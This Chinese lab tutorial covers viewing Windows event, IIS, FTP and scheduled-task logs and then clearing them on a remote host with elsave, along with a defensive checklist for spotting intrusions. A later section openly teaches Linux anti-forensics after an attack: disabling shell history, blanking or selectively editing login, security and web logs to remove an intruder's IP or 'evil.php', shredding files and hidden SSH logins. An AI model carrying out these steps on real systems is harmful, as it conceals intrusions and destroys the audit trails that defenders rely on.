windows日志文件查看与清理

日志查看

(1) 启动Windows实验台，点击：开始 - 控制面板 - 管理工具 - 事件查看器。如下图所示。

(2) 应用程序日志、安全日志、系统日志、DNS日志默认位置：%sys temroot%\system32\config，默认文件大小512KB，管理员可以改变这个默认大小。

安全日志文件：%systemroot%\system32\config\SecEvent.EVT；

系统日志文件：%systemroot%\system32\config\SysEvent.EVT；

应用程序日志文件：%systemroot%\system32\config\AppEvent.EVT；

DNS日志：%systemroot%\system32\config\DnsEvent.EVT；

在事件查看器中右键应用程序（或安全性、系统、DNS服务器）查看属性可以得到日志存放文件的路径，并可修改日志文件的大小，清除日志。例如选中“应用程序”右键属性，如下图：

选中事件查看器中左边的树形结构图中的日志类型（应用程序、安全性或系统），右击“查看”，并选择“筛选”。或者点击属性页面的筛选器标签，日志筛选器将会启动。通过筛选器系统会过滤出管理员希望查看的日志记录

(3) 查看www和ftp日志文件夹下的日志文件

（由于实验环境中不允许访问互联网，无法操作得出日志文件。请参考指导书使用个人电脑进行实验。）

尝试对www服务中某一文件进行访问，则日志中则会有相应的日志记录如下图。

日志中记录了访问www服务的请求地址，管理员可以根据请求地址，发现网络上的攻击，管理员可根据日志信息，采取一定的防护措施。

ftp的日志中同样会记录ftp服务的登陆用户，以及登陆之后的操作。

(4) 计划任务日志

当入侵者得到远程系统的shell之后，常会利用计划任务运行功能更加强大的木马程序，计划任务日志详细的记录的计划任务的执行时间，程序名称等详细信息。

打开计划任务文件夹，点击“高级”-查看日志，即可查看计划任务日志。

日志清除

(1) 删除事件查看器中的日志

主机下载使用elsave清除日志工具

下载地址：http://tools.hetianlab.com/tools/Elsave.rar

先用ipcKaTeX parse error: Undefined control sequence: \ipc at position 42: …e \\对方IP（实验台IP）\̲i̲p̲c̲ “密码” /user:“用户名”；

连接成功后，开始进行日志清除。

清除目标系统的应用程序日志输入elsave.exe -s \对方ip -l “application” -C

清除目标系统的系统日志输入elsave.exe -s \对方IP -l “system” -C

清除目标系统的安全日志输入elsave.exe -s \对方IP -l “security” -C

输入如下图

回车后可以查看远程主机内的系统日志已经被删除了

(2) 删除常见服务日志

IIS的日志功能，它可以详细的记录下入侵全过程，如用unicode入侵时IE里打的命令，和对80端口扫描时留下的痕迹。

手动清除：日志的默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志。进入到远程主机后（也可直接在实验台中操作），cmd下切换到这个目录下，然后 del .。或者删除某一天的日志。如果无法删除文件，首先需要停止w3svc服务，再对日志文件进行删除，使用net 命令停止服务如下：

C:>net stop w3svc

World Wide Web Publishing Service 服务正在停止。

World Wide Web Publishing Service 服务已成功停止。

日志w3svc停止后，然后清空它的日志, del .

C:>net start w3svc

清除ftp日志，日志默认位置：%systemroot%\sys tem32\logfiles\msftpsvc1\，默认每天一个日志，清除方法同上。

(3) 删除计划任务日志

先来删除计划任务日志：

在实验台中命令行进入日志所在文件夹下（%systemroot%\Tasks），删除schedlgu.txt ，提示无法访问文件，因为另一个程序正在使用此文件。说明服务保护，需要先把服务停掉。命令行中输入net stop schedule;

下面的服务依赖于Task Scheduler 服务。停止Task Scheduler 服务也会停止这些服务。

Remote Storage Engine

Task Scheduler 服务正在停止. Task Scheduler 服务已成功停止。

如上显示服务停掉了，同时也停掉了与它有依赖关系的服务。再来删除schedlgu.txt；

删除后需要再次启动该任务以便主机能够正常工作，输入net start schedule：

答案

分析与思考

1、还有哪些途径可以发现网络中存在的攻击或者入侵。

日志文件、进程、自启动项目、网络连接、安全模式、映像劫持、CPU时间

2、清理日志能否把所有的痕迹都清理干净。

不能，还应删除操作记录，所做的每一个操作，都要被抹掉;所上传的工具，都应该被安全地删掉

补充
电脑被入侵排查方法

一、进程
首先排查的就是进程了，方法简单，开机后，什么都不要启动！
第一步：直接打开任务管理器，查看有没有可疑的进程，不认识的进程可以Google或者百度一下。
PS：如果任务管理器打开后一闪就消失了，可以判定已经中毒；如果提示已经被管理员禁用，则要引起警惕！
第二步：打开冰刃等软件，先查看有没有隐藏进程（冰刃中以红色标出），然后查看系统进程的路径是否正确。
PS：如果冰刃无法正常使用，可以判定已经中毒；如果有红色的进程，基本可以判断已经中毒；如果有不在正常目录的正常系统进程名的进程，也可以判断已经中毒。
第三步：如果进程全部正常，则利用Wsyscheck等工具，查看是否有可疑的线程注入到正常进程中。
PS：Wsyscheck会用不同颜色来标注被注入的进程和正常进程，如果有进程被注入，不要着急，先确定注入的模块是不是病毒，因为有的杀软也会注入进程。
二、自启动项目
进程排查完毕，如果没有发现异常，则开始排查启动项。
第一步：用msconfig察看是否有可疑的服务，开始，运行，输入“msconfig”，确定，切换到服务选项卡，勾选“隐藏所有Microsoft服务”复选框，然后逐一确认剩下的服务是否正常（可以凭经验识别，也可以利用搜索引擎）。
PS：如果发现异常，可以判定已经中毒；如果msconfig无法启动，或者启动后自动关闭，也可以判定已经中毒。
第二步：用msconfig察看是否有可疑的自启动项，切换到“启动”选项卡，逐一排查就可以了。
第三步，用Autoruns等，查看更详细的启动项信息（包括服务、驱动和自启动项、IEBHO等信息）。
PS：这个需要有一定的经验。
三、网络连接
ADSL用户，在这个时候可以进行虚拟拨号，连接到Internet了。
然后直接用冰刃的网络连接查看，是否有可疑的连接，对于IP地址，可以到http://www.ip138.com/查询，对应的进程和端口等信息可以到Google或百度查询。
如果发现异常，不要着急，关掉系统中可能使用网络的程序（如迅雷等下载软件、杀毒软件的自动更新程序、IE浏览器等），再次查看网络连接信息。
四、安全模式
重启，直接进入安全模式，如果无法进入，并且出现蓝屏等现象，则应该引起警惕，可能是病毒入侵的后遗症，也可能病毒还没有清除！
五、映像劫持
打开注册表编辑器，定位到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOpti，查看有没有可疑的映像劫持项目，如果发现可疑项，很可能已经中毒。
六、CPU时间
如果开机以后，系统运行缓慢，还可以用CPU时间做参考，找到可疑进程，方法如下：
打开任务管理器，切换到进程选项卡，在菜单中点“查看”，“选择列”，勾选“CPU时间”，然后确定，单击CPU时间的标题，进行排序，寻找除了SystemIdleProcess和SYSTEM以外，CPU时间较大的进程，这个进程需要一起一定的警惕。

在攻击结束后，如何不留痕迹的清除日志和操作记录，以掩盖入侵踪迹，这其实是一个细致的技术活。你所做的每一个操作，都要被抹掉;你所上传的工具，都应该被安全地删掉。

01、清除history历史命令记录第一种方式：(1)编辑history记录文件，删除部分不想被保存的历史命令。vim~/.bash_history(2)清除当前用户的history命令记录history-c第二种方式：(1)利用vim特性删除历史命令#使用vim打开一个文件vitest.txt#设置vim不记录命令，Vim会将命令历史记录，保存在viminfo文件中。:sethistory=0#用vim的分屏功能打开命令记录文件.bash_history，编辑文件删除历史操作命令vsp~/.bash_history#清除保存.bash_history文件即可。(2)在vim中执行自己不想让别人看到的命令:sethistory=0:!command第三种方式：通过修改配置文件/etc/profile，使系统不再保存命令记录。HISTSIZE=0第四种方式：登录后执行下面命令,不记录历史命令(.bash_history)unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=002、清除系统日志痕迹Linux 系统存在多种日志文件，来记录系统运行过程中产生的日志。/var/log/btmp记录所有登录失败信息，使用lastb命令查看/var/log/lastlog记录系统中所有用户最后一次登录时间的日志，使用lastlog命令查看/var/log/wtmp记录所有用户的登录、注销信息，使用last命令查看/var/log/utmp记录当前已经登录的用户信息，使用w,who,users等命令查看/var/log/secure记录与安全相关的日志信息/var/log/message记录系统启动后的信息和错误日志第一种方式：清空日志文件清除登录系统失败的记录：[root@centos]#echo>/var/log/btmp[root@centos]#lastb//查询不到登录失败信息清除登录系统成功的记录：[root@centos]#echo>/var/log/wtmp[root@centos]#last//查询不到登录成功的信息清除相关日志信息：清除用户最后一次登录时间：echo>/var/log/lastlog#lastlog命令清除当前登录用户的信息：echo>/var/log/utmp#使用w,who,users等命令清除安全日志记录：cat/dev/null>/var/log/secure清除系统日志记录：cat/dev/null>/var/log/message第二种方式：删除/替换部分日志日志文件全部被清空，太容易被管理员察觉了，如果只是删除或替换部分关键日志信息，那么就可以完美隐藏攻击痕迹。#删除所有匹配到字符串的行,比如以当天日期或者自己的登录ipsed-i'/自己的ip/'d/var/log/messages#全局替换登录IP地址：sed-i's/192.168.166.85/192.168.1.1/g'secure03、清除web入侵痕迹第一种方式：直接替换日志ip地址sed-i's/192.168.166.85/192.168.1.1/g'access.log第二种方式：清除部分相关日志#使用grep-v来把我们的相关信息删除,cat/var/log/nginx/access.log|grep-vevil.php>tmp.log#把修改过的日志覆盖到原日志文件cattmp.log>/var/log/nginx/access.log/04、文件安全删除工具(1)shred命令实现安全的从硬盘上擦除数据，默认覆盖3次，通过 -n指定数据覆盖次数。[root@centos]#shred-f-u-z-v-n81.txtshred:1.txt:pass1/9(random)...shred:1.txt:pass2/9(ffffff)...shred:1.txt:pass3/9(aaaaaa)...shred:1.txt:pass4/9(random)...shred:1.txt:pass5/9(000000)...shred:1.txt:pass6/9(random)...shred:1.txt:pass7/9(555555)...shred:1.txt:pass8/9(random)...shred:1.txt:pass9/9(000000)...shred:1.txt:removingshred:1.txt:renamedto00000shred:00000:renamedto0000shred:0000:renamedto000shred:000:renamedto00shred:00:renamedto0shred:1.txt:removed(2)dd命令可用于安全地清除硬盘或者分区的内容。ddif=/dev/zeroof=要删除的文件bs=大小count=写入的次数(3)wipeWipe 使用特殊的模式来重复地写文件，从磁性介质中安全擦除文件。wipefilename(4)Secure-DeleteSecure-Delete 是一组工具集合，提供srm、smem、sfill、sswap，4个安全删除文件的命令行工具。srmfilenamesfillfilenamesswap/dev/sda1smem05、隐藏远程SSH登陆记录隐身登录系统，不会被w、who、last等指令检测到。ssh-Troot@192.168.0.1/bin/bash-i不记录ssh公钥在本地.ssh目录中ssh-oUserKnownHostsFile=/dev/null-Tuser@host/bin/bash–i

windows日志文件查看与清理相关推荐

mysql日志满如何清理_mysql 日志爆满，删除日志文件，定时清理日志
今天发现网站不能正常访问,于是登陆服务器查找问题. 机智的我随手用命令:df -l 发现硬盘爆满了,于是就知道问题所在了. Filesystem 1K-blocks Used Available U ...
Linux 下高级日志文件查看器Log File Navigator
Log File Navigator,简称lnav,是一款面向小规模的适用于 Linux 的高级日志文件查看器.它是一个终端应用程序,可以理解您的日志文件,让您轻松找到问题,几乎不需要什么设置. ln ...
linux生成日志文件,linux实现按天生成日志文件并自动清理
linux实现按天生成日志文件并自动清理前篇文章中讲到如何在Linux crontab创建每秒执行的方法,高人可能早意识到日志文件没做处理,假如没人工处理久了日后越来越大肯定会出现问题,当然人工处理 ...
linux日志自动按天保存,linux实现按天生成日志文件并自动清理
linux实现按天生成日志文件并自动清理前篇文章中讲到如何在Linux crontab创建每秒执行的方法,高人可能早意识到日志文件没做处理,假如没人工处理久了日后越来越大肯定会出现问题,当然人工处理 ...
linux日志文件怎么查看,linux 日志文件查看
记录下日志中常用的日志查看命令. 1. tail -n 10 -f **.log 显示日志文件尾部10行日志,当有新日志产生,会追加显示. 2. tail 命令现ff.sh中有如下信息: [ro ...
Widows Log Files (windows日志文件)
1.1 计划任务服务 Schedlgu.txt为计划任务服务的日志文件,可以在下面的键值指定该文件的路径 Key: HKLM/SOFTWARE/Microsoft/SchedulingAgent Va ...
计算机操作日志文件,查看电脑操作记录(LastActivityView)
查看电脑操作记录(LastActivityView)是一款简单而有用的软件,可以在列表中清清楚楚的看到你的电脑使用历史记录.该软件直接调用系统日志,能显示安装软件.系统启动.关机.网络连接.执行的程序 ...
windows DNS缓存查看与清理
在浏览器进行域名解析时,会先看浏览器本地缓存的数据,如果没有在查看电脑缓存的数据. 而查看本地电脑域名缓存数据的命令是 ipconfig /displaydns 但是一般缓存的数据都比较多,所以将缓存 ...
SQL日志文件查看工具(Log Explorer for SQL Server v4.2)
下载地址:http://download.csdn.net/source/2284248 1.Log Explorer for SQL Server v4.2.1 该软件我比较推荐的安装完毕后,注册 ...
SQL Server 日志文件查看器提示超时连接
今天早上碰到的一个问题,因为解决了所以打算记录下来做个技术储备,顺便为其他跟我一样碰到相关问题但是不懂解决还没找到解决方法的人提供一个帮助. 不知道有没有人遇到过这个问题,打开作业历史记录查看的时候发 ...

windows日志文件查看与清理

windows日志文件查看与清理相关推荐

最新文章

热门文章